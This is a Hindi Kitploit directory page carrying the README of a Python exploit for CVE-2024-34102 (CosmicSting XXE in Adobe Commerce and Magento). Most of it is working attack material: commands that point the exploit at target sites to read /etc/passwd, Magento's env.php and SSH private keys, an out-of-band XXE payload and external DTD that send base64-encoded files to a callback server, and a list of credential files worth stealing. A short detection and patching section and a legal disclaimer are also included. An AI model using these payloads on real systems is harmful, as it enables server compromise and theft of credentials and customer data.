Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-34102 — python3 के लिए CVE-2024-34102 शोषण | Kitploit
उपकरण/GitHubGitHub/nmmorette/cve-2024-34102
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

python3 के लिए CVE-2024-34102 शोषण

रिपॉजिटरी देखें
116 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-34102 - CosmicSting XXE शोषण

Python Version CVE

CVE-2024-34102 (CosmicSting) के लिए शोषण - एडोब कॉमर्स और मैगेंटो में XML बाहरी इकाई (XXE) भेद्यता।

📋 भेद्यता के बारे में

CVE-2024-34102 एक महत्वपूर्ण XXE (XML बाहरी इकाई) भेद्यता है जो प्रभावित करती है:

  • एडोब कॉमर्स संस्करण 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 और पुराने
  • मैगेंटो ओपन सोर्स (समान संस्करण)

यह भेद्यता एक अप्रमाणित हमलावर को अनुमति देती है:

  • 📄 सर्वर से मनमानी फ़ाइलें पढ़ना
  • 🔐 क्रेडेंशियल्स और संवेदनशील कॉन्फ़िगरेशन चुराना
  • 💾 डेटाबेस जानकारी तक पहुँचना
  • 🚨 कुछ परिदृश्यों में मनमाना कोड निष्पादित करना

CVSS स्कोर: 9.8 (महत्वपूर्ण)

🎯 क्रेडिट्स

यह शोषण मूल कार्य पर आधारित है:

  • @Chocapikk - मूल CVE-2024-34102

इस संस्करण में सुधार:

  • ✅ कस्टम डायनामिक DTD सर्वर (fars.ee निर्भरता से बचता है)
  • ✅ स्वचालित डिकोडिंग के साथ कॉलबैक सर्वर
  • ✅ आवश्यक पैरामीटर सत्यापन
  • ✅ बाहरी सेवाओं के लिए पुनः प्रयास तर्क
  • ✅ अधिक वर्णनात्मक त्रुटि संदेश
  • ✅ कॉलबैक के लिए HTTPS समर्थन
  • ✅ पूर्ण Python 3.8+ अनुकूलता
  • 🛠️ आवश्यकताएँ

    • Python 3.8 या उच्चतर
    • DTD फ़ाइलों को होस्ट करने के लिए सर्वर तक पहुँच (VPS, Burp Collaborator, आदि)
    • कॉलबैक सेवा (Burp Collaborator, Oastify, या अपना स्वयं का सर्वर)

    📦 स्थापना

    root@kitploit:~
    # रिपॉजिटरी क्लोन करें
    git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
    cd CVE-2024-34102
    
    # निर्भरताएँ स्थापित करें
    pip install -r requirements.txt
    

    🚀 उपयोग

    विधि 1: fars.ee का उपयोग (स्वचालित)

    root@kitploit:~
    python3 exploit.py \
      -u https://target.com \
      -f /etc/passwd \
      -c your-callback.oastify.com
    

    विधि 2: अपने स्वयं के DTD सर्वर का उपयोग

    टर्मिनल 1 - DTD सर्वर:

    root@kitploit:~
    sudo python3 server_dtd.py
    

    टर्मिनल 2 - शोषण:

    root@kitploit:~
    python3 exploit.py \
      -u https://target.com \
      -f /etc/passwd \
      -c your-callback.oastify.com \
      --dtd-server YOUR-IP:8000
    

    विधि 3: अपने स्वयं के कॉलबैक सर्वर के साथ

    टर्मिनल 1 - DTD सर्वर:

    root@kitploit:~
    sudo python3 server_dtd.py
    

    टर्मिनल 2 - कॉलबैक सर्वर (स्वचालित डिकोड):

    root@kitploit:~
    sudo python3 callback_server.py
    

    टर्मिनल 3 - शोषण:

    root@kitploit:~
    python3 exploit.py \
      -u https://target.com \
      -f /etc/passwd \
      -c YOUR-CALLBACK-IP \
      --dtd-server YOUR-DTD-IP:8000
    

    📝 पैरामीटर

    आवश्यक:

    • -u, --url - लक्ष्य URL (आधार डोमेन)
    • -f, --file - सर्वर से पढ़ी जाने वाली फ़ाइल (जैसे /etc/passwd)
    • -c, --callback - कॉलबैक सर्वर (IP/डोमेन)

    वैकल्पिक:

    • --dtd-server - DTD फ़ाइल को होस्ट करने के लिए कस्टम सर्वर
    • --https - कॉलबैक के लिए HTTPS का उपयोग करें (डिफ़ॉल्ट: HTTP)

    🎬 उदाहरण

    /etc/passwd पढ़ें

    root@kitploit:~
    python3 exploit.py \
      -u https://vulnerable-site.com \
      -f /etc/passwd \
      -c abc123.oastify.com \
      --dtd-server 192.168.1.100:8000
    

    मैगेंटो कॉन्फ़िगरेशन पढ़ें

    root@kitploit:~
    python3 exploit.py \
      -u https://vulnerable-site.com \
      -f /var/www/html/app/etc/env.php \
      -c abc123.oastify.com \
      --dtd-server 192.168.1.100:8000
    

    SSH कुंजियाँ पढ़ें

    root@kitploit:~
    python3 exploit.py \
      -u https://vulnerable-site.com \
      -f /home/ubuntu/.ssh/id_rsa \
      -c abc123.burpcollaborator.net \
      --dtd-server 192.168.1.100:8000 \
      --https
    

    🔍 यह कैसे काम करता है

    1. आउट-ऑफ-बैंड XXE

    शोषण डेटा को बाहर निकालने के लिए आउट-ऑफ-बैंड XXE तकनीक का उपयोग करता है:

    root@kitploit:~
    <!-- लक्ष्य को भेजा गया पेलोड -->
    <!DOCTYPE r [
      <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
      %sp;
      %param1;
    ]>
    <r>&exfil;</r>
    

    2. बाहरी DTD

    लक्ष्य सर्वर दुर्भावनापूर्ण DTD डाउनलोड करता है:

    root@kitploit:~
    <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
    

    3. डेटा निष्कर्षण

    सर्वर XML को प्रोसेस करता है, फ़ाइल को पढ़ता है, इसे base64 में एन्कोड करता है और कॉलबैक पर भेजता है:

    root@kitploit:~
    GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
    

    4. डिकोडिंग

    root@kitploit:~
    echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
    

    📊 उदाहरण आउटपुट

    root@kitploit:~
    [*] CosmicSting XXE Exploit (CVE-2024-34102)
    [*] Target: https://vulnerable-site.com
    [+] Callback Server: abc123.oastify.com
    [+] Using custom DTD server: 192.168.1.100:8000
    [+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
    
    DTD will be dynamically generated with:
    [*]   Callback: http://abc123.oastify.com
    [*]   File: /etc/passwd
    
    DTD server is running? Ready to continue? [y/N]: y
    [+] Target file: /etc/passwd
    [+] Callback URL: http://abc123.oastify.com/?exploited=...
    [*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
    [*] Response status: 500
    [!] Status 500 - This is normal! XXE may have triggered.
    [!] Check your callback server for incoming requests.
    [*] Waiting for callback (5 seconds)...
    
    === CHECK YOUR CALLBACK SERVER ===
    [!] Monitor your callback service for incoming HTTP requests
    [!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>
    
    To decode the exfiltrated data:
    [*]   echo 'BASE64_STRING' | base64 -d
    
    [!] Check your Burp Collaborator or Oastify dashboard now!
    

    🛡️ पहचान और शमन

    रक्षकों के लिए:

    पहचान:

    • /rest/V1/guest-carts/*/estimate-shipping-methods एंडपॉइंट्स पर HTTP अनुरोधों की निगरानी करें
    • बाहरी इकाइयों (<!ENTITY) वाले XML पेलोड पर अलर्ट दें
    • संदिग्ध डोमेन के लिए आउटबाउंड कनेक्शन का पता लगाएं

    शमन:

    • पैच किए गए संस्करणों में अपडेट करें:
      • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
    • XML पार्सर में बाहरी इकाई प्रसंस्करण अक्षम करें
    • एंटी-XXE नियमों के साथ WAF लागू करें

    पेंटेस्टर्स के लिए:

    परीक्षण के लिए रुचिकर फ़ाइलें:

    root@kitploit:~
    /etc/passwd
    /var/www/html/app/etc/env.php
    /var/www/html/app/etc/local.xml
    /home/USER/.ssh/id_rsa
    /var/log/apache2/access.log
    /proc/self/environ
    

    ⚖️ कानूनी अस्वीकरण

    root@kitploit:~
    This exploit is provided for educational and security research purposes only.
    
    Using this code to test systems without explicit authorization is ILLEGAL.
    
    You are SOLELY responsible for your actions. Use only on:
    ✅ Your own test environments
    ✅ Authorized bug bounty programs
    ✅ Contracted penetration tests
    
    DO NOT use on:
    ❌ Systems without authorization
    ❌ Production environments without permission
    ❌ Any malicious activity
    
    The author is not responsible for misuse of this code.
    

    📚 संदर्भ

    • Adobe सुरक्षा बुलेटिन APSB24-40
    • CVE-2024-34102 विवरण
    • OWASP XXE रोकथाम
    • Chocapikk द्वारा मूल शोषण

    ⭐ यदि यह परियोजना उपयोगी थी, तो कृपया इसे एक स्टार देने पर विचार करें!

    टूल डाउनलोड करें